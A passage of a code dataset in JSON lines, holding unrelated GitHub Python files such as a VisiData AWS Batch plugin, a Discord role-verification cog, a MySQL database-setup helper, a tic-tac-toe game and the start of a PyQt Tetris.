status(self):\n result = f'Total population: {sum(r.members_count for r in self.rooms)}\\n'\n for r in self.rooms:\n result += f'{r.family_name} with {r.members_count} members. Budget: {r.budget:.2f}$, Expenses: {r.expenses:.2f}$\\n'\n if r.__class__.__name__ == 'YoungCoupleWithChildren':\n for i, c in enumerate(r.children):\n result += f'--- Child {i + 1} monthly cost: {c.cost * 30:.2f}$\\n'\n result += f'--- Appliances monthly cost: {sum(a.get_monthly_expense() for a in r.appliances):.2f}$\\n'\n return result\n","repo_name":"MihailMarkovski/Python-OOP-2020","sub_path":"Exams/Exam_22_August_2020_TAKE_3/project/everland.py","file_name":"everland.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24433870753","text":"from src.validation_utils import eh_nulo_ou_vazio, valida_email, valida_CPF\n\n\nclass Cliente:\n\n def __init__(self, email: str, CPF: str, endereco: str,\n complemento: str, cidade: str,\n estado: str):\n self.set_email(email)\n self.set_CPF(CPF)\n self.set_endereco(endereco)\n self.set_complemento(complemento)\n self.set_cidade(cidade)\n self.set_estado(estado)\n\n def set_email(self, email: str) -> None:\n\n if not valida_email(email):\n raise Exception(\"Email invalido\")\n\n self.email = email\n\n def set_CPF(self, CPF: str) -> None:\n\n if not valida_CPF(CPF):\n raise Exception(\"CPF invalido\")\n\n self.CPF = CPF\n\n def set_endereco(self, endereco: str) -> None:\n\n if eh_nulo_ou_vazio(endereco):\n raise Exception(\"Endereco invalido\")\n\n self.endereco = endereco\n\n def set_complemento(self, complemento: str) -> None:\n\n if eh_nulo_ou_vazio(complemento):\n raise Exception(\"Complemento invalido\")\n\n self.complemento = complemento\n\n def set_cidade(self, cidade: str) -> None:\n\n if eh_nulo_ou_vazio(cidade):\n raise Exception(\"Cidade invalido\")\n\n self.cidade = cidade\n\n def set_estado(self, estado: str) -> None:\n\n if eh_nulo_ou_vazio(estado):\n raise Exception(\"Estado invalido\")\n\n self.estado = estado\n","repo_name":"IgorNascAlves/nossa-casa-do-codigo-fundamentos","sub_path":"src/cliente.py","file_name":"cliente.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32783598409","text":"import visidata\nfrom datetime import datetime\nfrom visidata import date as vddate\n\n__version__ = '2020.05.28'\n\n\ndef openurl_aws(url, filetype):\n assert url.given.startswith(\"aws://\")\n path = url.given.replace(\"aws://\", \"\", 1).rstrip(\"/\")\n\n if path in {\"batch\", \"batch/jobs\"}:\n return AWSBatchJobsSheet(\"aws-batch-jobs\", source = url)\n\n # XXX TODO support aws://batch/jobs/\n # XXX TODO support aws://batch/queues\n # XXX TODO support aws://batch/queues/\n\n raise ValueError(\"Unsupported AWS resource: %s\" % url.given)\n\n\nclass AWSBatchJobsSheet(visidata.Sheet):\n \"\"\"\n Sheet with one row per AWS Batch job, across all statuses and queues.\n \"\"\"\n rowtype = \"jobs\" # rowdef: Job\n columns = [\n visidata.ColumnAttr(\"id\"),\n visidata.ColumnAttr(\"queue\"),\n visidata.ColumnAttr(\"status\"),\n visidata.ColumnAttr(\"status_reason\"),\n visidata.ColumnAttr(\"created\", type=vddate),\n visidata.ColumnAttr(\"started\", type=vddate),\n visidata.ColumnAttr(\"stopped\", type=vddate),\n visidata.ColumnAttr(\"runtime\"),\n visidata.SubColumnAttr(\"runtime\", visidata.ColumnAttr(\"seconds\", type=int), name=\"runtime_seconds\"),\n 
visidata.ColumnAttr(\"name\"),\n visidata.ColumnAttr(\"image\"),\n visidata.ColumnAttr(\"cmd\"),\n visidata.ColumnAttr(\"definition\"),\n visidata.ColumnAttr(\"cpus\", type=int),\n visidata.ColumnAttr(\"memory_mib\", type=int),\n ]\n\n nKeys = 1\n\n STATUSES = [\n \"SUBMITTED\",\n \"PENDING\",\n \"RUNNABLE\",\n \"STARTING\",\n \"RUNNING\",\n \"SUCCEEDED\",\n \"FAILED\",\n ]\n\n def __init__(self, name, source):\n super().__init__(name=name, source=source)\n\n # Late import to avoid requiring boto3 if this sheet/plugin is never used.\n import boto3\n self.client = boto3.client(\"batch\")\n\n @visidata.asyncthread\n def reload(self):\n self.rows = []\n\n list_queues = self.client.get_paginator(\"describe_job_queues\").paginate\n\n queues = sorted([\n queue[\"jobQueueName\"]\n for page in list_queues()\n for queue in page[\"jobQueues\"] ])\n\n loading_threads = [\n self._load_jobs(queue, status)\n for queue in queues\n for status in self.STATUSES ]\n\n # Wait for all jobs to load before sorting\n visidata.vd.sync(*loading_threads)\n\n # Sort by the existing order, if any, otherwise add an ordering.\n if self._ordering:\n self.sort()\n else:\n self.orderBy(\n self.column(\"created\"),\n self.column(\"started\"),\n reverse = True)\n\n @visidata.asyncthread\n def _load_jobs(self, queue, status):\n list_jobs = self.client.get_paginator(\"list_jobs\").paginate\n\n # Page size of 100 because that's the limit of describe_jobs(),\n # which is called inside this loop.\n for page in list_jobs(jobQueue = queue, jobStatus = status, PaginationConfig = {\"MaxItems\": 100}):\n job_ids = [ job[\"jobId\"] for job in page[\"jobSummaryList\"] ]\n\n if job_ids:\n for job in self.client.describe_jobs(jobs = job_ids)[\"jobs\"]:\n self.rows.append(Job(job))\n\n\nclass Job:\n \"\"\"\n A data class describing a single AWS Batch job, used for each row of an\n :py:class:`AWSBatchJobsSheet`.\n \"\"\"\n def __init__(self, source):\n self.id = source[\"jobId\"]\n self.name = source[\"jobName\"]\n self.queue = arn_name(source[\"jobQueue\"])\n self.status = source[\"status\"]\n self.created = timestamp(source.get(\"createdAt\"))\n self.started = timestamp(source.get(\"startedAt\"))\n self.stopped = timestamp(source.get(\"stoppedAt\"))\n self.image = source[\"container\"][\"image\"]\n self.cmd = \" \".join(source[\"container\"][\"command\"])\n self.definition = arn_name(source[\"jobDefinition\"])\n self.cpus = next((int(r[\"value\"]) for r in source[\"container\"][\"resourceRequirements\"] if r[\"type\"] == \"VCPUS\"), None)\n self.memory_mib = next((int(r[\"value\"]) for r in source[\"container\"][\"resourceRequirements\"] if r[\"type\"] == \"MEMORY\"), None)\n self.__source = source\n\n @property\n def status_reason(self):\n reason = self.__source.get(\"statusReason\")\n container_reason = self.__source.get(\"container\", {}).get(\"reason\")\n exit_code = self.__source.get(\"container\", {}).get(\"exitCode\")\n\n # Make the default/normal reason more informative\n if reason == \"Essential container in task exited\":\n if exit_code is not None:\n reason = \"exited %d\" % exit_code\n else:\n reason = \"exited\"\n\n if reason and container_reason:\n return \"%s, %s\" % (container_reason, reason)\n else:\n return reason or container_reason\n\n @property\n def runtime(self):\n if self.started:\n return (self.stopped or datetime.now().replace(microsecond=0)) - self.started\n else:\n return None\n\n\ndef timestamp(value):\n return vddate(value // 1000) if value is not None else None\n\n\ndef arn_name(arn):\n return 
arn.split(\":\", 5)[-1].split(\"/\", 1)[-1]\n\n\nvisidata.addGlobals({\n \"openurl_aws\": openurl_aws,\n \"AWSBatchJobsSheet\": AWSBatchJobsSheet,\n})\n","repo_name":"tsibley/visidata-plugins","sub_path":"vdaws.py","file_name":"vdaws.py","file_ext":"py","file_size_in_byte":5376,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"35976776424","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Apr 1 09:05:58 2019\r\n\r\n@author: klowell\r\n\"\"\"\r\n\r\n#%%\r\n##############################################################################\r\n# This is a utility program that drops variables from big csvs so that\r\n# subsequent analysis will be quicker..\r\n######################## MAIN PART OF PROGRAM ##############################\r\n# Import libraries.\r\nimport pandas as pd\r\n################## FILES AND DIRECTORIES ######################################\r\nin_path='C:/LAS_Kim/LAS_Data/LAS_Topography/'\r\nout_path='C:/LAS_Kim/LAS_Data/LAS_for_Analysis/'\r\n#file_list=['df2016_430000e_2707500n']\r\nfile_list=['df2016_430000e_2707500n','df2016_426000e_2708000n',\r\n 'df2016_420500e_2728500n','df2016_428000e_2719500n']\r\ninfile_suffix='_alltopo_w_inciangle_azimuth_chunked'\r\noutfilesuffix='_all_for_final_analysis.csv'\r\n#################### hyperparameters #################################\r\nvars2drop=['tile','flghtpth','gpstime','x','y','z','scan_angle',\r\n 'SBET_time','SBETtmdif','edge_time','edgtmdif','edgscnangl',\r\n 'SBETtime']\r\n###########################################################################\r\n# Read csv files, drop varialbes, and output.\r\nfor file in file_list:\r\n print('Reading file',file)\r\n dfin=pd.read_csv(in_path+file+infile_suffix+'.csv')\r\n dfin.drop(vars2drop,inplace=True,axis=1)\r\n print('Writing file',file+outfilesuffix,'\\n')\r\n dfin.to_csv(out_path+file+outfilesuffix,index=False)","repo_name":"KLowellNZ/IJGIS_Pulse","sub_path":"final_drop_vars.py","file_name":"final_drop_vars.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2060613606","text":"#Создаем переменную\r\nquest_number = int(input(\"Введите число \"))\r\n# концепция проекта такая: если число простое, то при делению по модулю всегда будет остаток. Если посчитать эти остатки\r\n# и сравнить их с самим числом за вычетом двух из него, то можно понять, простое оно или нет. \r\ncycle_th = quest_number - 1\r\ncounter = 0\r\ncontrol_number = quest_number - 2\r\n#Проводим базовый отвев числа\r\nif quest_number == 2:\r\n\tprint('Простое число')\r\nelif quest_number % 2 == 0:\r\n\tprint(\"Дурачок чтоли? 
посмотри на последнюю цифру в том, что ты нарисовал здесь!!!\")\r\nelse:\r\n#Проводим дальнейшую провеку на простоту\r\n\twhile cycle_th >= 2:\r\n\t\tmodule_num = quest_number % cycle_th\r\n\t\tcycle_th -= 1\r\n\t\tif module_num > 0:\r\n\t\t\tcounter += 1\r\n#\r\n\tif control_number - counter == 0:\r\n\t\tprint(\"Это элементарно, Ватсон - число простое\")\r\n\telse:\r\n\t\tprint(\"Число не так просто, как кажется\")\r\n#Проверял таким образом то, какие результаты у меня в переменных хранились.\r\nprint(\"Проверка: Счетчик равен \" + str(counter) + \" итератор - \" + str(cycle_th) + \" контрольная сумма равна \" + str(control_number))","repo_name":"nikonoff16/Simple_Number","sub_path":"simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35190580822","text":"#\n#\tKeyHandler.py\n#\n#\t(c) 2021 by Andreas Kraft\n#\tLicense: BSD 3-Clause License. See the LICENSE file for further details.\n#\n#\tThese module implements a handler for keyboard inputs.\n#\tIt should run on *IX-alikes and Windows OS.\n#\n\nfrom __future__ import annotations\nimport sys, time, select\nfrom typing import Callable, Dict\n\n_timeout = 0.5\n\ntry:\n\timport tty, termios\nexcept ImportError:\n\t# Probably Windows.\n\ttry:\n\t\timport msvcrt\n\texcept ImportError:\n\t\t# FIXME what to do on other platforms?\n\t\t# Just give up here.\n\t\traise ImportError('getch not available')\n\telse:\n\t\tgetch = msvcrt.getch\t# type: ignore\n\n\t\tdef flushInput() -> None:\n\t\t\tpass\n\t\t\t# while msvcrt.kbhit():\t# type: ignore\n\t\t\t# \tmsvcrt.getch()\t\t# type: ignore\n\nelse:\n\t_errorInGetch:bool = False\n\tdef getch() -> str:\n\t\t\"\"\"getch() -> key character\n\n\t\tRead a single keypress from stdin and return the resulting character. \n\t\tNothing is echoed to the console. This call will block if a keypress \n\t\tis not already available, but will not wait for Enter to be pressed. \n\n\t\tIf the pressed key was a modifier key, nothing will be detected; if\n\t\tit were a special function key, it may return the first character of\n\t\tof an escape sequence, leaving additional characters in the buffer.\n\t\t\"\"\"\n\t\tglobal _errorInGetch\n\t\tif _errorInGetch:\t\t# getch() doesnt't fully work previously, so just return\n\t\t\treturn None\n\n\t\tfd = sys.stdin.fileno()\n\t\ttry:\n\t\t\told_settings = termios.tcgetattr(fd)\n\n\t\texcept:\n\t\t\t_errorInGetch = True\n\t\t\treturn None\n\n\t\ttry:\n\t\t\t#tty.setraw(fd)\n\t\t\ttty.setcbreak(fd)\t# Not extra lines in input\n\t\t\tif select.select([sys.stdin,], [], [], _timeout)[0]:\n\t\t\t\tch = sys.stdin.read(1)\n\t\t\t\tif ch == '\\x1b':\n\t\t\t\t\tch2 = sys.stdin.read(1)\n\t\t\t\t\tif ch2 == '[':\n\t\t\t\t\t\tch3 = sys.stdin.read(1)\n\t\t\t\t\t\tch += ch2 + ch3\n\t\t\telse:\n\t\t\t\tch = None\n\t\tfinally:\n\t\t\ttermios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n\t\treturn ch\n\t\n\tdef flushInput() -> None:\n\t\tsys.stdin.flush()\n\n\nCommands = Dict[str, Callable[[str], None]]\n\"\"\" Mapping between characters and callback functions. \"\"\"\n\n_stopLoop = False\n\"\"\" Internal variable to indicate to stop the keyboard loop. 
\"\"\"\n\n\ndef loop(commands:Commands, quit:str = None, catchKeyboardInterrupt:bool = False, headless:bool = False, ignoreException:bool = True, catchAll:Callable = None) -> None:\n\t\"\"\"\tEndless loop that reads single chars from the keyboard and then executes\n\t\ta handler function for that key (from the dictionary `commands`).\n\t\tIf a single 'key' value is set in `quit` and this key is pressed, then\n\t\tthe loop terminates.\n\n\t\tIf `catchKeyboardInterrupt` is True, then this key is handled as the ^C key,\n\t\totherweise a KeyboardInterrupt event is raised.\n\n\t\tIf `headless` is True, then operate differently. Ignore all key inputs, but handle\n\t\ta keyboard interrupt. If the `quit` key is set then the loop is just interrupted. Otherwise\n\t\ttread the keyboard interrupt as ^C key. It must be hanled in the `commands`.\n\n\t\tIf `ignoreException` is True, then exceptions raised during command execution is ignore, or\n\t\tpassed on otherwise.\n\n\t\tIf `catchAll` is given then this callback is called in case the pressed key was not found\n\t\tin `commands`.\n\t\"\"\"\n\t\n\t# main loop\n\tch:str = None\n\twhile True:\t\n\n\t\t# normal console operation: Get a key. Catch a ctrl-c keyboard interrup and handle it according to configuration\n\t\tif not headless:\n\t\t\ttry:\n\t\t\t\tch = getch() # this also returns the key pressed, if you want to store it\n\t\t\t\tif isinstance(ch, bytes):\t# Windows getch() returns a byte-string\n\t\t\t\t\tch = ch.decode('utf-8') # type: ignore [attr-defined]\n\t\t\texcept KeyboardInterrupt as e:\n\t\t\t\tflushInput()\n\t\t\t\tif catchKeyboardInterrupt:\n\t\t\t\t\tch = '\\x03'\n\t\t\t\telse:\n\t\t\t\t\traise e \n\t\t\texcept Exception:\t# Exit the loop when there is any other problem\n\t\t\t\tbreak\n\n\t\t\t# handle \"quit\" key\t\t\t\n\t\t\tif quit is not None and ch == quit:\n\t\t\t\tbreak\n\t\t\t\n\t\t# When headless then look only for keyboard interrup\n\t\tif _stopLoop:\n\t\t\tbreak\n\t\t\t# Just break?\n\t\t\tif quit is not None or not '\\x03' in commands:\t# shortcut: if there is a quit key OR ^C is not in the commands, then just return from the loop\n\t\t\t\tbreak\n\t\t\tch = '\\x03'\t\t\t\t\t\t\t\t\t\t# Assign ^C\n\n\t\t# hande potential headless state: just sleep a moment, but only when not keyboad interrupt was received\n\t\tif headless and not _stopLoop:\n\t\t\ttry:\n\t\t\t\ttime.sleep(0.2)\n\t\t\t\tcontinue\n\t\t\texcept KeyboardInterrupt:\n\t\t\t\tbreak\n\n\t\t# handle all other keys\n\t\tif ch in commands:\n\t\t\ttry:\n\t\t\t\tcommands[ch](ch)\n\t\t\texcept SystemExit:\n\t\t\t\traise\n\t\t\texcept Exception as e:\n\t\t\t\tif not ignoreException:\n\t\t\t\t\traise e\n\t\telif ch and catchAll:\n\t\t\tcatchAll(ch)\n\n\ndef stopLoop() -> None:\n\t\"\"\"\tStop the keyboard loop.\n\t\"\"\"\n\tglobal _stopLoop\n\t_stopLoop = True\n\n\ndef readline(prompt:str='>') -> str:\n\t\"\"\"\tRead a line from the console. \n\t\tCatch EOF (^D) and Keyboard Interrup (^C). 
In that case None is returned.\n\t\"\"\"\n\tanswer = None\n\ttry:\n\t\t# assign to the variable that is actually returned below\n\t\tanswer = input(prompt)\n\texcept KeyboardInterrupt as e:\n\t\tpass\n\texcept Exception:\n\t\tpass\n\treturn answer\n\ndef waitForKeypress(s:float) -> str:\n\tfor i in range(0, int(s * 1.0 / _timeout)):\n\t\tch = None\n\t\ttry:\n\t\t\tch = getch()\t# returns after _timeout s\n\t\texcept KeyboardInterrupt as e:\n\t\t\tch = '\\x03'\n\t\texcept Exception:\n\t\t\treturn None\n\t\tif ch is not None:\n\t\t\treturn ch\n\treturn None","repo_name":"ankraft/onem2m-jupyter-notebooks","sub_path":"tools/ACME/acme/helpers/KeyHandler.py","file_name":"KeyHandler.py","file_ext":"py","file_size_in_byte":5191,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"}
+{"seq_id":"42954695605","text":"import discord\r\nfrom discord.ext import commands\r\n\r\n\r\nclass VerifyButton(discord.ui.View):\r\n    def __init__(self):\r\n        super().__init__(timeout=None)\r\n\r\n    @discord.ui.button(label='역할받기', style=discord.ButtonStyle.primary, custom_id='verify-role')\r\n    async def role(self, button, interaction):\r\n        role = interaction.guild.get_role(1061120395639529562)\r\n        await interaction.user.add_roles(role)\r\n        return await interaction.response.send_message('역할이 지급되었습니다.', ephemeral=True)\r\n\r\n\r\nclass Join(commands.Cog):\r\n    def __init__(self, bot):\r\n        self.bot = bot\r\n\r\n    @commands.Cog.listener()\r\n    async def on_member_join(self, member):\r\n        \"\"\"\r\n        Member join event handler\r\n        :param member: Default param for getting the joined member. Nothing to do for this param\r\n        :return\r\n        \"\"\"\r\n        if member.guild.id != 860930425811894313:\r\n            return None\r\n\r\n        channel = self.bot.get_channel(860930425811894316)\r\n        rule = self.bot.get_channel(1061090011220545547)\r\n        embed = discord.Embed(title=\"환영합니다!\", color=0x967969,\r\n                              description=f\"안녕하세요 {member.mention}님, \"\r\n                                          f\"베어타운에 오신 것을 환영합니다!\\n\"\r\n                                          f\"{rule.mention} 채널에서 서버 규칙을 확인하신 후,\\n\"\r\n                                          f\"채널 하단의 메시지에 버튼을 눌러 역할을 획득해 주세요.\")\r\n        embed.set_author(name=member, icon_url=getattr(member.avatar, 'url', self.bot.user.avatar.url))\r\n        embed.set_thumbnail(url=member.guild.icon.url)\r\n        embed.set_footer(text=\"베어타운\", icon_url=self.bot.user.avatar.url)\r\n        return await channel.send(member.mention, embed=embed)\r\n\r\n    @commands.command(name='verify')\r\n    async def verify_create(self, ctx, channel: discord.TextChannel):\r\n        \"\"\"\r\n        Create get-role message\r\n        :param ctx: Default param for getting the information of the caller. Nothing to do for this param\r\n        :param channel: mention a channel to send a get-role message\r\n        :return:\r\n        \"\"\"\r\n        if not ctx.author.guild_permissions.view_audit_log:\r\n            return await ctx.respond(\"권한이 없습니다.\", ephemeral=True)\r\n\r\n        embed = discord.Embed(title=\"역할받기\", color=0x967969,\r\n                              description=\"규칙을 숙지하셨다면 아래의 버튼을 눌러 역할을 받아주세요.\")\r\n        embed.set_footer(text=\"베어타운\", icon_url=self.bot.user.avatar.url)\r\n        await channel.send(embed=embed, view=VerifyButton())\r\n\r\n        return await ctx.reply(f\"생성이 완료되었습니다. 
{channel.mention}\")\r\n\r\n\r\ndef setup(bot):\r\n bot.add_cog(Join(bot))\r\n","repo_name":"qkrwldnjs/beartown-bot","sub_path":"extensions/join.py","file_name":"join.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14867012183","text":"def draw_field(field):\r\n \r\n print(f' 1 2 3')\r\n print('--------')\r\n for i in range(3):\r\n print( f\"{i+1} {field[i][0]} {field[i][1]} {field[i][2]}\" )\r\n print('--------')\r\n \r\nfield = [[' '] * 3 for i in range(3)]\r\n\r\n# Функция, которая проверяет, выиграл ли кто-то\r\ndef get_winner(field):\r\n# Проверяем строки\r\n for i in range(3):\r\n if field[i][0] == field[i][1] == field[i][2] and field[i][0] != ' ':\r\n return field[i][0]\r\n# Проверяем столбцы\r\n for i in range(3):\r\n if field[0][i] == field[1][i] == field[2][i] and field[0][i] != ' ':\r\n return field[0][i]\r\n# Проверяем диагонали\r\n if field[0][0] == field[1][1] == field[2][2] and field[0][0] != ' ':\r\n return field[0][0]\r\n if field[2][0] == field[1][1] == field[0][2] and field[2][0] != ' ':\r\n return field[2][0]\r\n# Если никто не выиграл, возвращаем None\r\n return None\r\n\r\ndef cords():\r\n while True:\r\n \r\n row = input(\"Введите номер строки: \")\r\n \r\n if not (row.isdigit()):\r\n print('Символ вне диапазона, выбери другй (1, 2 или 3)')\r\n continue\r\n \r\n row = int(row) - 1\r\n \r\n if row < 0 or row > 2:\r\n print('Символ вне диапазона, выбери другй (1, 2 или 3)')\r\n continue\r\n \r\n col = input(\"Введите номер столбца: \")\r\n \r\n if not (col.isdigit()):\r\n print('Символ вне диапазона, выбери другй (1, 2 или 3)')\r\n continue\r\n \r\n col = int(col) - 1\r\n \r\n if col < 0 or col > 2:\r\n print('Символ вне диапазона, выбери другй (1, 2 или 3)')\r\n continue\r\n \r\n if field[row][col] != ' ':\r\n print(\"Эта клетка уже занята, попробуйте еще раз\")\r\n continue\r\n return row, col\r\n\r\n# Запускаем игру\r\ncounter = 0\r\ncurrent_player = 'X'\r\nwhile True:\r\n \r\n draw_field(field)\r\n print(\"Ход игрока\", current_player)\r\n row, col = cords()\r\n \r\n counter += 1\r\n \r\n field[row][col] = current_player\r\n winner = get_winner(field)\r\n if winner:\r\n draw_field(field)\r\n print(\"Выиграл игрок\", winner)\r\n break\r\n if current_player == 'X':\r\n current_player = 'O'\r\n else:\r\n current_player = 'X'\r\n if counter == 9:\r\n draw_field(field)\r\n print('Ничья!')\r\n break","repo_name":"Dyoma09/PDEV28_B5_6_XO","sub_path":"крестики-нолики.py","file_name":"крестики-нолики.py","file_ext":"py","file_size_in_byte":2743,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74253457706","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 28 10:22:55 2015\n\n@author: rbanderson\n\"\"\"\nimport numpy\nimport ccam\n\n\ndef target_lookup(filelist,masterlistfile,name_sub_file):\n data,labels=ccam.read_csv(masterlistfile,1,labelrow=True)\n \n targets=numpy.array(data[:,5],dtype='string')\n sclocks=numpy.array(data[:,2],dtype='string')\n dists=numpy.array(data[:,8],dtype='string')\n amps=numpy.array(data[:,17],dtype='string')\n nshots=numpy.array(data[:,11])\n\n \n file_sclocks=numpy.zeros_like(filelist)\n file_targets=numpy.zeros_like(filelist) \n file_amps=numpy.zeros_like(filelist)\n file_dists=numpy.zeros_like(filelist)\n file_nshots=numpy.zeros(len(filelist))\n filelist_unique=numpy.unique(filelist)\n \n for i in range(len(filelist_unique)):\n 
filelist_ind=filelist==filelist_unique[i]\n file_sclocks[filelist_ind]=filelist_unique[i][-36:-27]\n# if max(sclocks==file_sclocks[filelist_ind_true][0]) is not False:\n#\n# if len(targets[(sclocks==file_sclocks[filelist_ind_true][0])])!=0:\n# file_targets[filelist_ind]=targets[(sclocks==file_sclocks[filelist_ind_true][0])][0]\n# file_dists[filelist_ind]=dists[(sclocks==file_sclocks[filelist_ind_true][0])][0]\n# file_amps[filelist_ind]=amps[(sclocks==file_sclocks[filelist_ind_true][0])][0]\n# file_nshots[filelist_ind]=nshots[(sclocks==file_sclocks[filelist_ind_true][0])][0]\n matchindex1=numpy.in1d(file_sclocks,sclocks)\n matchindex=numpy.in1d(sclocks,file_sclocks)\n file_targets=numpy.zeros(len(filelist),dtype='a400')\n file_dists=numpy.zeros(len(filelist),dtype='a10')\n file_amps=numpy.zeros(len(filelist),dtype='a10')\n file_nshots=numpy.zeros(len(filelist),dtype='int')\n \n file_targets[matchindex1]=targets[matchindex]\n file_dists[matchindex1]=dists[matchindex]\n file_amps[matchindex1]=amps[matchindex]\n file_nshots[matchindex1]=nshots[matchindex]\n data=ccam.read_csv(name_sub_file,0,labelrow=False)\n old_name=data[:,0]\n new_name=data[:,1] \n for i in range(len(old_name)):\n file_targets[(file_targets==old_name[i])]=new_name[i]\n \n return file_targets,file_dists,file_amps,file_nshots","repo_name":"freesiemens/Working","sub_path":"ccam/target_lookup.py","file_name":"target_lookup.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31863459861","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.homer, name=\"index\"),\n path(\"add/\", views.bart, name=\"add\"),\n path(\"/update/\", views.lisa, name=\"update\"),\n path(\"/delete/\", views.barny, name=\"delete\"),\n]\n","repo_name":"peerhoffmanncode/Coding-DCI","sub_path":"InClasses_Training/django/DjangoFromScratch/reminder/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26706638306","text":"#import tensorflow as tf\n\nimport tensorflow.compat.v1 as tf\ntf.disable_v2_behavior()\n\n\nnode1 = tf.constant(3.0, tf.float32)\nnode2 = tf.constant(4.0) # also tf.float32 implicitly\nnode3 = tf.add(node1, node2)\n\nprint(\"node1:\", node1, \"node2:\", node2)\nprint(\"node3: \", node3)\n#결과는 텐서임을 알려주는것만 출력됨\n\n\nsess = tf.Session()\nprint(\"sess.run(node1, node2): \", sess.run([node1, node2]))\nprint(\"sess.run(node3): \", sess.run(node3))\n#실제결과는 세션을 만들어야지 출력됨\n\n\n","repo_name":"shhan0226/TensorFlow","sub_path":"BasicDeepLearning/Lab1/Lab1-3.Computational_Graph.py","file_name":"Lab1-3.Computational_Graph.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14567572239","text":"import contextlib\nfrom oslocfg import cfg\n\nfrom seafutil.dbengine import DbEngineBase\n\nCONF = cfg.CONF\n\n\nclass DbEngine(DbEngineBase):\n\n ENGINEPREFIX = 'mysql+mysqldb'\n\n\n def tables(self):\n tbs = []\n with self.engine.connect() as conn:\n r = conn.execute(\"show tables\")\n for row in r:\n tbs.append(row[0])\n r.close()\n return tbs\n\n def databases(self):\n dbs = []\n with self.engine.connect() as conn:\n r = conn.execute(\"show databases\")\n for row in r:\n dbs.append(row[0])\n r.close()\n return dbs\n\n def create_db(self):\n sql = \"CREATE DATABASE %s default character set 
utf8\" % CONF.dbname\n with self.engine.connect() as conn:\n r = conn.execute(sql)\n r.close()\n\n\n def create_user(self):\n _auth = {'schema': CONF.dbname,\n 'user': CONF.dbuser,\n 'passwd': CONF.dbpass,\n 'source': CONF.scope,\n 'privileges': 'ALL'}\n sqls = [\"GRANT %(privileges)s ON %(schema)s.* \"\n \"TO '%(user)s'@'%(source)s' IDENTIFIED by '%(passwd)s'\" % _auth,\n 'FLUSH PRIVILEGES']\n with self.engine.connect() as conn:\n for sql in sqls:\n r = conn.execute(sql)\n r.close()\n\n\n def drop_user(self):\n sqls = [\"DROP USER '%s'@'%s'\" % (CONF.dbuser, CONF.scope),\n 'FLUSH PRIVILEGES']\n with self.engine.connect() as conn:\n for sql in sqls:\n r = conn.execute(sql)\n r.close()\n\n def drop_db(self):\n sql = \"DROP DATABASE %s\" % CONF.dbname\n with self.engine.connect() as conn:\n r = conn.execute(sql)\n r.close()\n\n\n @contextlib.contextmanager\n def _create(self):\n if CONF.dbname in self.databases():\n raise ValueError('Database already exist, try --nocreate')\n try:\n self.create_db()\n self.create_user()\n yield\n except Exception as e:\n self.drop_db()\n self.drop_user()\n raise e\n","repo_name":"lolizeppelin/seafutil","sub_path":"seafutil/dbengine/mysql.py","file_name":"mysql.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19284651235","text":"#!/usr/bin/python\n\n\"\"\"\nZetCode PyQt5 tutorial\n\nThis example shows an icon\nin the titlebar of the window.\n\nAuthor: Jan Bodnar\nWebsite: zetcode.com\n\"\"\"\n\nimport sys\nfrom PyQt5.QtCore import Qt, QBasicTimer, pyqtSignal\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QDesktopWidget, QFrame\nfrom PyQt5.QtGui import QPainter, QColor, QBrush\n\n\nclass Tetris(QMainWindow):\n\n def __init__(self):\n super().__init__()\n\n self.initUI()\n\n def initUI(self):\n \"\"\"initiates application UI\"\"\"\n\n self.tboard = Board(self)\n self.setCentralWidget(self.tboard)\n\n self.statusbar = self.statusBar()\n self.tboard.msg2Statusbar[str].connect(self.statusbar.showMessage)\n self.tboard.start()\n self.resize(180, 380)\n self.center()\n self.setWindowTitle('Tetris')\n self.show()\n\n def center(self):\n screen = QDesktopWidget().screenGeometry()\n size = self.geometry()\n self.move(int((screen.width() - size.width()) / 2),\n int((screen.height() - size.height()) / 2))\n\n\nclass Board(QFrame):\n msg2Statusbar = pyqtSignal(str)\n\n BoardWidth = 10\n BoardHeight = 22\n\n def __init__(self, parent):\n super().__init__(parent)\n\n self.initBoard()\n\n def initBoard(self):\n pass\n\n def squareWidth(self):\n \"\"\"returns the width of one square\"\"\"\n\n return self.contentsRect().width() // Board.BoardWidth\n\n def squareHeight(self):\n \"\"\"returns the height of one square\"\"\"\n\n return self.contentsRect().height() // Board.BoardHeight\n\n def start(self):\n self.msg2Statusbar.emit(\"Ready\")\n\n def paintEvent(self, e):\n painter = QPainter()\n painter.begin(self)\n self.drawBoard(painter)\n painter.end()\n\n def drawBoard(self, painter):\n rect = self.contentsRect()\n boardTop = rect.bottom() - Board.BoardHeight * self.squareHeight()\n\n for i in range(Board.BoardHeight):\n for j in 